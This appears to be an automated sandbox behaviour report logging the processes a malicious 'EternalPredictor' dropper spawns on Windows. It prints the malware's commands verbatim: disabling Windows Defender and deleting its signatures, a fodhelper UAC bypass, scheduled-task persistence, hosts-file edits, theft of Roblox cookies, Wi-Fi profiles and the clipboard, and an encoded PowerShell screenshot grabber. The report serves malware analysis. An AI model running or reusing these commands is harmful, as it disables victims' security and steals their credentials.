                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Removes signatures from Windows Defender
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: F642FE388
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3ac